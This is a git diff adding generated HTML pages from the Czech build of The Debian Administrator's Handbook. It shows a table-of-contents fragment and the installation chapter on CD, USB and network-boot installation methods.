+                      href="security.html#sect.defining-security-policy">14.1. Defining a Security Policy</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.firewall-packet-filtering.html">14.2. Firewall or Packet Filtering</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.firewall-packet-filtering.html#sect.netfilter">14.2.1. Netfilter Behavior</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.firewall-packet-filtering.html#sect.iptables">14.2.2. Syntax of <code
+                            class="command">iptables</code> and <code
+                            class="command">ip6tables</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.firewall-packet-filtering.html#sect.creating-rules">14.2.3. Creating Rules</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.firewall-packet-filtering.html#sect.install-rules-at-boot">14.2.4. Installing the Rules at Each Boot</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.supervision.html">14.3. Supervision: Prevention, Detection, Deterrence</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.supervision.html#sect.logcheck">14.3.1. Monitoring Logs with <code
+                            class="command">logcheck</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.supervision.html#sect.monitoring-activity">14.3.2. Monitoring Activity</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.supervision.html#id-1.17.6.6">14.3.3. Detecting Changes</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.supervision.html#sect.intrusion-detection">14.3.4. Detecting Intrusion (IDS/NIDS)</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.apparmor.html">14.4. Introduction to AppArmor</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.apparmor.html#sect.apparmor-principles">14.4.1. Principles</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apparmor.html#sect.apparmor-setup">14.4.2. Enabling AppArmor and managing AppArmor profiles</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apparmor.html#sect.apparmor-new-profile">14.4.3. Creating a new profile</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.selinux.html">14.5. Introduction to SELinux</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.selinux.html#sect.selinux-principles">14.5.1. Principles</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.selinux.html#sect.selinux-setup">14.5.2. Setting Up SELinux</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.selinux.html#sect.selinux-management">14.5.3. Managing an SELinux System</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.selinux.html#sect.selinux-custom-rules">14.5.4. Adapting the Rules</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html">14.6. Other Security-Related Considerations</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#id-1.17.9.3">14.6.1. Inherent Risks of Web Applications</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#id-1.17.9.4">14.6.2. Knowing What To Expect</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#sect.choosing-the-software-wisely">14.6.3. Choosing the Software Wisely</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#sect.managing-a-machine-as-a-whole">14.6.4. Managing a Machine as a Whole</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#sect.users-are-players">14.6.5. Users Are Players</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#sect.physical-security">14.6.6. Physical Security</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#id-1.17.9.9">14.6.7. Legal Liability</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html">14.7. Dealing with a Compromised Machine</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#id-1.17.10.3">14.7.1. Detecting and Seeing the Cracker's Intrusion</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#id-1.17.10.4">14.7.2. Putting the Server Off-Line</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#sect.keeping-everything-that-could-be-used-as-evidence">14.7.3. Keeping Everything that Could Be Used as Evidence</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#id-1.17.10.6">14.7.4. Re-installing</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#sect.forensic-analysis">14.7.5. Forensic Analysis</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#sect.reconstituting-the-attack-scenario">14.7.6. Reconstituting the Attack Scenario</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="debian-packaging.html">15. Creating a Debian Package</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="debian-packaging.html#sect.rebuilding-package">15.1. Rebuilding a Package from its Sources</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="debian-packaging.html#id-1.18.4.3">15.1.1. Getting the Sources</a></span></dt><dt><span
+                        class="section"><a
+                          href="debian-packaging.html#id-1.18.4.4">15.1.2. Making Changes</a></span></dt><dt><span
+                        class="section"><a
+                          href="debian-packaging.html#id-1.18.4.5">15.1.3. Starting the Rebuild</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.building-first-package.html">15.2. Building your First Package</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.building-first-package.html#id-1.18.5.2">15.2.1. Meta-Packages or Fake Packages</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.building-first-package.html#id-1.18.5.3">15.2.2. Simple File Archive</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.setup-apt-package-repository.html">15.3. Creating a Package Repository for APT</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.becoming-package-maintainer.html">15.4. Becoming a Package Maintainer</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.becoming-package-maintainer.html#id-1.18.7.2">15.4.1. Learning to Make Packages</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.becoming-package-maintainer.html#id-1.18.7.3">15.4.2. Acceptance Process</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="conclusion.html">16. Conclusion: Debian's Future</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="conclusion.html#sect.upcoming-developments">16.1. Upcoming Developments</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.future-of-debian.html">16.2. Debian's Future</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.future-of-this-book.html">16.3. Future of this Book</a></span></dt></dl></dd><dt><span
+                class="appendix"><a
+                  href="derivative-distributions.html">A. Derivative Distributions</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="derivative-distributions.html#sect.derivative-census">A.1. Census and Cooperation</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.ubuntu.html">A.2. Ubuntu</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.linux-mint.html">A.3. Linux Mint</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.knoppix.html">A.4. Knoppix</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.aptosid.html">A.5. Aptosid and Siduction</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.grml.html">A.6. Grml</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.tails.html">A.7. Tails</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kali.html">A.8. Kali Linux</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.devuan.html">A.9. Devuan</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.tanglu.html">A.10. Tanglu</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.doudoulinux.html">A.11. DoudouLinux</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.raspbian.html">A.12. Raspbian</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-derivatives.html">A.13. And Many More</a></span></dt></dl></dd><dt><span
+                class="appendix"><a
+                  href="short-remedial-course.html">B. Short Remedial Course</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="short-remedial-course.html#sect.shell-and-basic-commands">B.1. Shell and Basic Commands</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="short-remedial-course.html#id-1.21.4.5">B.1.1. Browsing the Directory Tree and Managing Files</a></span></dt><dt><span
+                        class="section"><a
+                          href="short-remedial-course.html#id-1.21.4.6">B.1.2. Displaying and Modifying Text Files</a></span></dt><dt><span
+                        class="section"><a
+                          href="short-remedial-course.html#id-1.21.4.7">B.1.3. Searching for Files and within Files</a></span></dt><dt><span
+                        class="section"><a
+                          href="short-remedial-course.html#id-1.21.4.8">B.1.4. Managing Processes</a></span></dt><dt><span
+                        class="section"><a
+                          href="short-remedial-course.html#id-1.21.4.9">B.1.5. System Information: Memory, Disk Space, Identity</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.filesystem-hierarchy.html">B.2. Organization of the Filesystem Hierarchy</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.filesystem-hierarchy.html#id-1.21.5.3">B.2.1. The Root Directory</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.filesystem-hierarchy.html#id-1.21.5.4">B.2.2. The User's Home Directory</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.computer-layers.html">B.3. Inner Workings of a Computer: the Different Layers Involved</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.computer-layers.html#sect.hardware">B.3.1. The Deepest Layer: the Hardware</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.computer-layers.html#sect.bios">B.3.2. The Starter: the BIOS or UEFI</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.computer-layers.html#sect.kernel">B.3.3. The Kernel</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.computer-layers.html#sect.userspace-presentation">B.3.4. The User Space</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.kernel-role-and-tasks.html">B.4. Some Tasks Handled by the Kernel</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.kernel-role-and-tasks.html#sect.hardware-drivers">B.4.1. Driving the Hardware</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-role-and-tasks.html#sect.filesystems">B.4.2. Filesystems</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-role-and-tasks.html#sect.shared-functions">B.4.3. Shared Functions</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-role-and-tasks.html#sect.process-management">B.4.4. Managing Processes</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-role-and-tasks.html#sect.permissions">B.4.5. Rights Management</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.user-space.html">B.5. The User Space</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.user-space.html#sect.process-basics">B.5.1. Process</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-space.html#sect.daemons">B.5.2. Daemons</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-space.html#sect.ipc">B.5.3. Inter-Process Communications</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-space.html#sect.libraries">B.5.4. Libraries</a></span></dt></dl></dd></dl></dd><dt><span
+                class="appendix"><a
+                  href="backcover.html">C. The Debian Administrator's Handbook</a></span></dt><dt><span
+                class="appendix"><a
+                  href="website.html">D. Get the book</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="website.html#sect.buy-the-paperback">D.1. Buy the English Paperback</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.download-the-electronic-version.html">D.2. Download the electronic version</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.download-the-book.html">D.3. Download the book</a></span></dt></dl></dd></dl></div></div><ul
+        class="docnav"><li
+          class="previous"></li><li
+          class="next"><a
+            accesskey="n"
+            href="preface.html"><strong>Další</strong>Úvodní slovo</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/installation.html b/tmp/cs-CZ/html/installation.html
new file mode 100644
index 000000000..dbe54e1d4
--- /dev/null
+++ b/tmp/cs-CZ/html/installation.html
@@ -0,0 +1,316 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 4. Installation</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Installation, Partitioning, Formatting, File System, Boot Sector, Hardware Detection" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.how-to-migrate.html"
+        title="3.2. How To Migrate" /><link
+        rel="next"
+        href="sect.installation-steps.html"
+        title="4.2. Installing, Step by Step" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/installation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.how-to-migrate.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.installation-steps.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="installation"></a>Kapitola 4. Installation</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="installation.html#sect.installation-methods">4.1. Installation Methods</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="installation.html#sect.install-cd">4.1.1. Installing from a CD-ROM/DVD-ROM</a></span></dt><dt><span
+                    class="section"><a
+                      href="installation.html#sect.install-usb">4.1.2. Booting from a USB Key</a></span></dt><dt><span
+                    class="section"><a
+                      href="installation.html#sect.install-net">4.1.3. Installing through Network Booting</a></span></dt><dt><span
+                    class="section"><a
+                      href="installation.html#sect.install-auto">4.1.4. Other Installation Methods</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.installation-steps.html">4.2. Installing, Step by Step</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-boot">4.2.1. Booting and Starting the Installer</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-lang">4.2.2. Selecting the language</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-country">4.2.3. Selecting the country</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-keyboard">4.2.4. Selecting the keyboard layout</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-detect-hardware">4.2.5. Detecting Hardware</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-load-components">4.2.6. Loading Components</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-detect-network">4.2.7. Detecting Network Hardware</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-network-config">4.2.8. Configuring the Network</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.10">4.2.9. Administrator Password</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.11">4.2.10. Creating the First User</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-clock-config">4.2.11. Configuring the Clock</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-detect-disks">4.2.12. Detecting Disks and Other Devices</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-partman">4.2.13. Starting the Partitioning Tool</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.15">4.2.14. Installing the Base System</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.16">4.2.15. Configuring the Package Manager (<code
+                        class="command">apt</code>)</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.17">4.2.16. Debian Package Popularity Contest</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.18">4.2.17. Selecting Packages for Installation</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.installing-grub">4.2.18. Installing the GRUB Bootloader</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.20">4.2.19. Finishing the Installation and Rebooting</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.after-first-boot.html">4.3. After the First Boot</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.after-first-boot.html#id-1.7.13.5">4.3.1. Installing Additional Software</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.after-first-boot.html#id-1.7.13.6">4.3.2. Upgrading the System</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		To use Debian, you need to install it on a computer; this task is taken care of by the <span
+              class="emphasis"><em>debian-installer</em></span> program. A proper installation involves many operations. This chapter reviews them in their chronological order.
+	</div></div><a
+          id="id-1.7.4"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> A catch-up course in the appendices</strong></p></div></div></div><div
+            class="para">
+		Installing a computer is always simpler when you are familiar with the way it works. If you are not, make a quick detour to <a
+              class="xref"
+              href="short-remedial-course.html">B – „<em>Short Remedial Course</em>“</a> before reading this chapter.
+	</div></div><div
+          class="para">
+		The installer for <span
+            class="distribution distribution">Stretch</span> is based on <code
+            class="command">debian-installer</code>. Its modular design enables it to work in various scenarios and allows it to evolve and adapt to changes. Despite the limitations implied by the need to support a large number of architectures, this installer is very accessible to beginners, since it assists users at each stage of the process. Automatic hardware detection, guided partitioning, and graphical user interfaces have solved most of the problems that newbies used to face in the early years of Debian.
+	</div><a
+          id="id-1.7.7"
+          class="indexterm"></a><a
+          id="id-1.7.8"
+          class="indexterm"></a><div
+          class="para">
+		Installation requires 128 MB of RAM (Random Access Memory) and at least 2 GB of hard drive space. All Falcot computers meet these criteria. Note, however, that these figures apply to the installation of a very limited system without a graphical desktop. A minimum of 512 MB of RAM and 10 GB of hard drive space are really recommended for a basic office desktop workstation.
+	</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BEWARE</em></span> Upgrading from Jessie</strong></p></div></div></div><div
+            class="para">
+		If you already have Debian Jessie installed on your computer, this chapter is not for you! Unlike other distributions, Debian allows updating a system from one version to the next without having to reinstall the system. Reinstalling, in addition to being unnecessary, could even be dangerous, since it could remove already installed programs.
+	</div><div
+            class="para">
+		The upgrade process will be described in <a
+              class="xref"
+              href="sect.dist-upgrade.html">6.6 – „Upgrading from One Stable Distribution to the Next“</a>.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.installation-methods"></a>4.1. Installation Methods</h2></div></div></div><div
+            class="para">
+			A Debian system can be installed from several types of media, as long as the BIOS of the machine allows it. You can for instance boot with a CD-ROM, a USB key, or even through a network.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> BIOS, the hardware/software interface</strong></p></div></div></div><a
+              id="id-1.7.11.3.2"
+              class="indexterm"></a><a
+              id="id-1.7.11.3.3"
+              class="indexterm"></a><div
+              class="para">
+			BIOS (which stands for Basic Input/Output System) is a software that is included in the motherboard (the electronic board connecting all peripherals) and executed when the computer is booted, in order to load an operating system (via an adapted bootloader). It stays in the background to provide an interface between the hardware and the software (in our case, the Linux kernel).
+		</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-cd"></a>4.1.1. Installing from a CD-ROM/DVD-ROM</h3></div></div></div><div
+              class="para">
+				The most widely used installation method is from a CD-ROM (or DVD-ROM, which behaves exactly the same way): the computer is booted from this media, and the installation program takes over.
+			</div><div
+              class="para">
+				Various CD-ROM families have different purposes: <span
+                class="emphasis"><em>netinst</em></span> (network installation) contains the installer and the base Debian system; all other programs are then downloaded. Its “image”, that is the ISO-9660 filesystem that contains the exact contents of the disk, only takes up about 150 to 280 MB (depending on architecture). On the other hand, the complete set offers all packages and allows for installation on a computer that has no Internet access; it requires around 14 DVD-ROMs (or 3 Blu-ray disks). There is no more official CD-ROMs set as they were really huge, rarely used and now most of the computers use DVD-ROMs as well as CD-ROMs. But the programs are divided among the disks according to their popularity and importance; the first disk will be sufficient for most installations, since it contains the most used softwares.
+			</div><div
+              class="para">
+				There is a last type of image, known as <code
+                class="filename">mini.iso</code>, which is only available as a by-product of the installer. The image only contains the minimum required to configure the network and everything else is downloaded (including parts of the installer itself, which is why those images tend to break when a new version of the installer is released). Those images can be found on the normal Debian mirrors under the <code
+                class="filename">dists/<em
+                  class="replaceable">release</em>/main/installer-<em
+                  class="replaceable">arch</em>/current/images/netboot/</code> directory.
+			</div><a
+              id="id-1.7.11.4.5"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Multi-architecture disks</strong></p></div></div></div><div
+                class="para">
+				Most installation CD- and DVD-ROMs work only with a specific hardware architecture. If you wish to download the complete images, you must take care to choose those which work on the hardware of the computer on which you wish to install them.
+			</div><div
+                class="para">
+				Some CD/DVD-ROM images can work on several architectures. We thus have a CD-ROM image combining the <span
+                  class="emphasis"><em>netinst</em></span> images of the <span
+                  class="emphasis"><em>i386</em></span> and <span
+                  class="emphasis"><em>amd64</em></span> architectures.
+			</div></div><a
+              id="id-1.7.11.4.7"
+              class="indexterm"></a><a
+              id="id-1.7.11.4.8"
+              class="indexterm"></a><a
+              id="id-1.7.11.4.9"
+              class="indexterm"></a><a
+              id="id-1.7.11.4.10"
+              class="indexterm"></a><div
+              class="para">
+				To acquire Debian CD-ROM images, you may of course download them and burn them to disk. You may also purchase them, and, thus, provide the project with a little financial support. Check the website to see the list of DVD-ROM image vendors and download sites. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/CD/index.html">http://www.debian.org/CD/index.html</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-usb"></a>4.1.2. Booting from a USB Key</h3></div></div></div><a
+              id="id-1.7.11.5.2"
+              class="indexterm"></a><div
+              class="para">
+				Since most computers are able to boot from USB devices, you can also install Debian from a USB key (this is nothing more than a small flash-memory disk).
+			</div><div
+              class="para">
+				The installation manual explains how to create a USB key that contains the <code
+                class="command">debian-installer</code>. The procedure is very simple because ISO images for i386 and amd64 are hybrid images that can boot from a CD-ROM as well as from a USB key.
+			</div><div
+              class="para">
+				You must first identify the device name of the USB key (ex: <code
+                class="literal">/dev/sdb</code>); the simplest means to do this is to check the messages issued by the kernel using the <code
+                class="command">dmesg</code> command. Then you must copy the previously downloaded ISO image (for example debian-9.0.0-amd64-netinst.iso) with the command <code
+                class="command">cat debian-9.0.0-amd64-netinst.iso &gt;/dev/sdb; sync</code>. This command requires administrator rights, since it accesses the USB key directly and blindly erases its content.
+			</div><div
+              class="para">
+				A more detailed explanation is available in the installation manual. Among other things, it describes an alternative method of preparing a USB key that is more complex, but that allows to customize the installer's default options (those set in the kernel command line). <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/stable/amd64/ch04s03.html">http://www.debian.org/releases/stable/amd64/ch04s03.html</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-net"></a>4.1.3. Installing through Network Booting</h3></div></div></div><a
+              id="id-1.7.11.6.2"
+              class="indexterm"></a><a
+              id="id-1.7.11.6.3"
+              class="indexterm"></a><a
+              id="id-1.7.11.6.4"
+              class="indexterm"></a><div
+              class="para">
+				Many BIOSes allow booting directly from the network by downloading a kernel and a minimal filesystem image. This method (which has several names, such as <acronym
+                class="acronym">PXE</acronym> or <acronym
+                class="acronym">TFTP</acronym> boot) can be a life-saver if the computer does not have a CD-ROM reader, or if the BIOS can't boot from such media.
+			</div><div
+              class="para">
+				This installation method works in two steps. First, while booting the computer, the BIOS (or the network card) issues a BOOTP/DHCP request to automatically acquire an IP address. When a BOOTP or DHCP server returns a response, it includes a filename, as well as network settings. After having configured the network, the client computer then issues a TFTP (Trivial File Transfer Protocol) request for a file whose name was previously indicated. Once this file is acquired, it is executed as though it were a bootloader. This then launches the Debian installation program, which is executed as though it were running from the hard drive, a CD-ROM, or a USB key.
+			</div><div
+              class="para">
+				All the details of this method are available in the installation guide (“Preparing files for TFTP Net Booting” section). <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/stable/amd64/ch05s01.html#boot-tftp">http://www.debian.org/releases/stable/amd64/ch05s01.html#boot-tftp</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/stable/amd64/ch04s05.html">http://www.debian.org/releases/stable/amd64/ch04s05.html</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-auto"></a>4.1.4. Other Installation Methods</h3></div></div></div><div
+              class="para">
+				When we have to deploy customized installations for a large number of computers, we generally choose an automated rather than a manual installation method. Depending on the situation and the complexity of the installations to be made, we can use FAI (Fully Automatic Installer, described in <a
+                class="xref"
+                href="sect.automated-installation.html#sect.fai">12.3.1 – „Fully Automatic Installer (FAI)“</a>), or even a customized installation DVD with preseeding (see <a
+                class="xref"
+                href="sect.automated-installation.html#sect.d-i-preseeding">12.3.2 – „Preseeding Debian-Installer“</a>).
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.how-to-migrate.html"><strong>Předcházející</strong>3.2. How To Migrate</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.installation-steps.html"><strong>Další</strong>4.2. Installing, Step by Step</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/network-infrastructure.html b/tmp/cs-CZ/html/network-infrastructure.html
new file mode 100644
index 000000000..f707fe4f9
--- /dev/null
+++ b/tmp/cs-CZ/html/network-infrastructure.html
@@ -0,0 +1,299 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 10. Network Infrastructure</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.power-management.html"
+        title="9.12. Power Management: Advanced Configuration and Power Interface (ACPI)" /><link
+        rel="next"
+        href="sect.virtual-private-network.html"
+        title="10.2. Virtual Private Network" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
